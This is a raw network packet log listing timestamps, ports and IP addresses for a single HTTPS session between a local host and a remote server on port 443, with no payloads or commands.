Dec 19, 2024 07:58:01.857937098 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.857994080 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.858004093 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.859015942 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.859076977 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.859085083 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.871901989 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.871983051 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.871992111 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.872399092 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.872450113 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.872457981 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.873505116 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.873565912 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.873575926 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.887200117 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.887262106 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.887274027 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.887794971 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.887849092 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.887856960 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.888962030 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.889022112 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.889029980 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.900158882 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.900229931 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.900239944 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.900748968 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.900800943 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.900809050 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.901794910 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.901859999 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.901866913 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.917010069 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.917115927 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.917125940 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.917414904 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.917471886 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.917479992 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.919301987 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.919378042 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.919387102 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.927371025 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.927448034 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.927459002 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.927958012 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.928020954 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.928030014 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.929613113 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.929662943 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.929672003 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.936197996 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.936279058 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.936288118 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.936378956 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.936482906 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.936491013 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.938069105 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.938127041 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.938136101 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.952124119 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.952204943 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.952234983 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.952529907 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.952593088 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.952606916 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.953831911 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.953896046 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.953918934 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.960691929 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.960757017 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.960777044 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.961905956 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.961971045 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.961987019 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.962399960 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.962461948 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.962477922 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.975049019 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.975141048 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.975156069 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.977174044 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.977247000 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.977255106 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.985343933 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.985411882 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.985419035 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.985560894 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.985615969 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.985620975 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.985755920 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.985807896 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.985814095 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.986016989 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.986068964 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.986078978 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.994676113 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.994772911 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.994775057 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.994803905 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.994894981 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.995444059 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.996304989 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:01.996351004 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:01.996372938 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.004594088 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.004663944 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.004687071 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.005508900 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.005554914 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.005562067 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.013948917 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.014034033 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.014044046 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.014178991 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.014226913 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.014233112 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.017380953 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.017414093 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.017441988 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.017472029 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.017518044 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.023036957 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.023372889 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.023435116 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.023462057 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.024203062 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.024262905 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.024277925 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.034729958 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.034753084 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.034796953 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.034816980 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.034868956 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.035049915 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.035878897 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.035927057 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.035938025 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.049355984 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.049444914 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.049448967 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.049468040 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.049515009 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.049710989 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.050728083 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.050787926 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.050796032 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.064007044 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.064069986 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.064079046 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.064347982 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.064409971 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.064415932 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.065989971 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.066014051 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.066041946 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.066050053 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.066098928 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.080364943 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.080735922 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.080832958 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.080857038 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.081705093 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.081756115 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.081763983 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.102726936 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.102798939 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.102818012 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.103205919 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.103261948 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.103270054 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.104136944 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.104228020 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.104233980 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.115600109 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.115633011 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.115679026 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.115690947 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.115748882 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.116030931 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.116941929 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.116992950 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.116998911 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.130816936 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.130892038 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.130916119 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.131150961 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.131201982 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.131208897 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.132148981 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.132196903 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.132204056 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.138434887 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.138504028 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.138513088 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.138788939 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.138839006 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.138844967 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.139981985 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.140029907 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.140043974 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.155045986 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.155106068 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.155136108 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.155587912 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.155638933 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.155652046 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.156403065 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.156474113 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.156491995 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.163511038 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.163609982 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.163641930 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.163844109 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.163934946 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.163945913 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.165345907 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.165400982 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.165421963 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.186403036 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.186482906 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.186485052 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.186516047 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.186570883 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.186578035 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.187532902 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.187593937 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.187614918 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.188393116 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.188438892 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.188453913 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.189239025 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.189291000 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.189307928 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.190104961 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.190160990 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.190176010 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.196589947 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.196652889 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.196672916 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.196872950 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.196918011 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.196924925 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.197696924 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.197751999 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.197758913 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.207020044 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.207068920 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.207072020 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.207083941 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.207153082 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.207273960 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.208517075 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.208558083 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.208564997 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.217206955 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.217257977 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.217261076 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.217269897 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.217325926 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.217402935 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.218281984 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.218336105 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.218341112 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.225313902 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.225369930 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.225379944 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.225977898 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.226037025 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.226046085 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.226758957 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.226811886 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.226821899 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.233148098 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.233207941 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.233220100 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.233405113 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.233465910 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.233474970 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.234306097 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.234364033 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.234371901 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.248524904 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.248610973 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.248650074 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.248956919 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.249002934 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.249025106 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.249977112 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.250034094 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.250050068 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.261529922 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.261571884 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.261604071 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.262110949 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.262197018 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.262202024 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.262234926 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.262276888 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.262950897 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.276946068 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.277028084 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.277031898 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.277066946 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.277127028 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.278098106 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.278894901 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.278948069 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.278969049 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.299596071 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.299659967 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.299691916 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.300556898 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.300612926 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.300621986 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.301525116 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.301577091 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.301585913 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.313492060 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.313575983 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.313611031 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.314198017 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.314250946 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.314263105 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.315071106 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.315121889 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.315138102 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.328548908 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.328607082 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.328634977 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.329106092 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.329159975 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.329174995 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.330030918 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.330077887 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.330092907 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.336700916 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.336759090 CET	49712	443	192.168.2.6	172.217.17.65
Dec 19, 2024 07:58:02.336782932 CET	443	49712	172.217.17.65	192.168.2.6
Dec 19, 2024 07:58:02.336813927 CET	443	49712	172.217.17.65	192.168.2.6
